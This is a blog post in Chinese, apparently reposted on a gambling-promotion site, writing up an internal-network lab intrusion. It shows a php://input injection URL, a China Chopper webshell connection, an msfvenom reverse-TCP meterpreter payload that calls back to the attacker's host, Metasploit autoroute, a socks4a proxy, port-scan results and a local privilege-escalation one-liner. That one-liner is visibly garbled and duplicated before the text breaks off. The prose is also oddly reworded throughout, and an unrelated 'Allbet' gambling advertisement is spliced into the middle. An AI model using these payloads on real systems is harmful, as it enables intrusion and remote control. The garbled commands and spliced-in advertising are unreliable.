首页 科技正文

allbet币游:记一次糟心的内网靶场实战

约稿员 科技 2020-11-26 14:55:11 75 0

一开始的时刻对整个内网的拓扑结构还不熟,以是做的时刻有许多方式都没有想到去用,人人多多指教。

一、环境准备

用网线毗邻交换机

设置Winodwss攻击机IP为172.16.6.203

攻击机Kali IP为172.16.6.202

主机IP为172.16.6.201

网关为172.16.6.1

子网掩码255.255.255.0

目的IP 172.16.6.10

二、渗透详细流程总览拓扑图

一开始以为192.168.6.200,一台通俗的双网卡主机,没有发现是防火墙,以是10.1.1.0网段的主机拓扑不够清晰,厥后先生讲了才知道,防火墙做了端口映射。E主机的445端口映射到防火墙445端口,F主机的3389端口映射到防火墙的3389端口。

allbet币游:记一次糟心的内网靶场实战 第1张

攻击目的172.16.6.101、菜刀毗邻

接见主页。发现伪协议注入点。

http://172.16.6.10/index.php?page=php://input

使用菜刀毗邻,菜刀版本需2020年的版本。

2、天生并上传木马且回连meterpreter

查看phpinfo目的主机为Linux系统的主机。

Msf天生木马msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.6.147 LPORT=2337 -f elf -a x86 —platform linux -o /home/hula.elf

并use exploit/multi/handle模块监听木马回连情形。

将木马通过菜刀上传木马,赋予运行权限,然后执行。

发现回连到meterpreter。

3、内网信息网络(同时添加路由并确立socks署理)

ipconfig查看网卡信息,发现有两个网段的IP,分别为172.16.6.10和192.168.6.10。

自动添加路由run post/multi/manage/autoroute。

,

Allbet

www.allbet8.us欢迎进入欧搏平台(Allbet Game),欧搏平台开放欧搏Allbet开户、欧搏Allbet代理开户、欧搏Allbet电脑客户端、欧搏AllbetAPP下载等业务。

,

添加路由与署理:

use auxiliary/server/socks4a

show options

set srvhost 172.16.6.147

set srvport 1080

使用portscan模块举行端口扫描

search portscan

set rhosts 192.168.6.0/24。

ipconfig查看网卡信息,发现有两个网段的IP,分别为172.16.6.10和192.168.6.10

给msf添加192.168.6.10段的路由,run autoroute -s 192.168.6.0/24

添加署理:

use auxiliary/server/socks4a

show options

srvhost设为本机

srvport默认1080

可以看到扫描出15、16、17、200四台主机,端口开放情形为

192.168.6.15 21/22

192.168.6.16 22/80/3306/8080

192.168.6.17 22/80/3306

192.168.6.200 80/135/445/3389

4、实验本机提权

用一句话提权

printf “install uprobes /bin/sh” > exploit.conf; MODPROBE_OPTIONS=”-C exploit.conf” staprun -u whatever exploit.conf” staprun -u whatever> exploit.conf; MODPROBE_OPTIONS=”-C

版权声明

本文仅代表作者观点,
不代表本站泰初文化传媒有限公司的立场。
本文系作者授权发表,未经许可,不得转载。

发表评论

评论列表(0人评论 , 75人围观)
☹还没有评论,来说两句吧...

站点信息

  • 文章总数:2835
  • 页面总数:0
  • 分类总数:16
  • 标签总数:720
  • 评论总数:828
  • 浏览总数:1098927